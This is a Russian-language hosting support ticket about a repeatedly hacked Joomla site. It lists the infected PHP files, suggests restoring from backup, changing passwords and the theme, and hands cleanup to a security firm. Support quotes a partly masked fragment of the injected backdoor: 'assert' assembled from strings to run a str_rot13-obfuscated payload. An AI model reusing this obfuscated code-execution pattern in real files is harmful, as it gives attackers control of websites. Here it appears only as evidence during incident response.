Вопрос: |
что в этот раз? |
Ответ: |
все тоже. снова взлом |
Ответ: |
мы проверяем сайт на вирусы. зайдите в админку и смените тему сайта |
Ответ: |
отчет http://mera-tlt.ru/AI-BOLIT-REPORT-__-******-**-**-****_**-**.html |
Ответ: |
вот список файлов менявшихся сегодня ./index.php ./cli/finder_indexer.php ./plugins/system/ossystem/form/fields/customfooter.php ./plugins/system/nnframework/fields/header.php ./administrator/index.php ./administrator/components/com_modules/views/modules/tmpl/default_batch_footer.php ./administrator/components/com_menus/views/items/tmpl/default_batch_footer.php ./administrator/components/com_tags/views/tags/tmpl/default_batch_footer.php ./administrator/components/com_newsfeeds/views/newsfeeds/tmpl/default_batch_footer.php ./administrator/components/com_osmeta/form/fields/customfooter.php ./administrator/components/com_users/views/users/tmpl/default_batch_footer.php ./administrator/components/com_redirect/views/links/tmpl/default_batch_footer.php ./administrator/components/com_content/views/articles/tmpl/default_batch_footer.php ./administrator/components/com_banners/views/banners/tmpl/default_batch_footer.php ./administrator/components/com_finder/helpers/indexer/indexer.php ./administrator/components/com_finder/controllers/index.php ./administrator/components/com_finder/models/index.php ./administrator/components/com_finder/models/indexer.php ./administrator/components/com_osmap/form/fields/customfooter.php ./administrator/components/com_contact/views/contacts/tmpl/default_batch_footer.php ./administrator/components/com_categories/views/categories/tmpl/default_batch_footer.php ./administrator/templates/isis/index.php ./administrator/templates/system/index.php ./administrator/templates/hathor/index.php ./administrator/templates/web*easy/index.php ./administrator/templates/web*easy/index--w*e.php ./uploads/_thumbs/*ef***.php ./libraries/cms/form/field/headertag.php ./libraries/joomla/document/html/renderer/head.php ./modules/mod_menu/tmpl/default_heading.php ./modules/mod_footer/mod_footer.php ./layouts/joomla/modal/footer.php ./layouts/joomla/modal/header.php ./components/com_jcomments/tpl/default/tpl_index.php ./components/com_jce/editor/libraries/views/plugin/index.php ./templates/mera-tlt/index.php ./templates/protostar/index.php ./templates/beez*/index.php ./templates/__mera-tlt.old/index.php ./templates/system/index.php вот это вирус, ./uploads/_thumbs/*ef***.php видно даже невооруженным взглядом |
Вопрос: |
У вас есть бэкап до * марта? чистый чтобы восстановить работу сайта? |
Ответ: |
да, есть. но это не решит проблему. после восстановления проверьте сайт и смените все пароли. проверьет пользователей и компоненты сайта |
Ответ: |
мы восстановили. в бекапе тоже самое. попробуйте сменить тему сайта |
Вопрос: |
в бэкапе вирь или он чистый? |
Ответ: |
в бекапе тоже самое. mera-tlt.ru это уже восстанволеный из бекапа сайт. сейчас еще раз выполним проверку и предоставим отчет. зайдиет в админкуи смените тему сайту |
Вопрос: |
может я туплю - а есть не позднее * марта не зараженный бэкап? как нам зайти в адмиинку если сайт не открывается? |
Ответ: |
у вас в файлах сайта вот такие вставки //###==### error_reporting(*); ^M $strings = "as";$strings .= "sert";^M @$strings(str_rot**('riny(onfr**_qrpbqr("nJLtXTymp*I*XPEcLaLcXFO*VTIwnT*tWTyvqwftsFOyoUAyVUgcMvtuMJ*jqUxbWS*QG**YFHIoVzAfnJIhqS*wnTIwnlWqXFyxnJHbW //###==###
других бекапов к сожалению нет. утоните название темы сайта |
Ответ: |
причме файлы эти менялись еще в феврале |
Вопрос: |
тема: /*mera* |
Ответ: |
у вас и во всеъх модулях сайтатакие вставки. еще с февраля и января месяца. вы не очистилисайт после заражения и поэтом сайт был заражен повторно |
Ответ: |
сайт мы запустили Вам. теперь проверяйте все файлв и удаляйте из них код. скачайте файлы сайта на свой компьтер и проведите поиск по тексту файлов |
Вопрос: |
Лечением и защитой моего сайта будут заниматься специалисты из компании «Ревизиум». Пожалуйста, заблокируйте сайт в .* файле с помощью директивы *. Свои IP сотрудники «Ревизиум» пропишут сами. Сайт будет находиться в работе двое суток |
Ответ: |
Уточните IP сотрудников. |
Вопрос: |
я пока не знаю какие у них будут ip |
Ответ: |
Сообщите как только узнаете. |
Ответ: |
сотрудники ревизиум сами поставят свои ip. так же сообщие им что Вы с ERA Host, Вам предоставят скидку |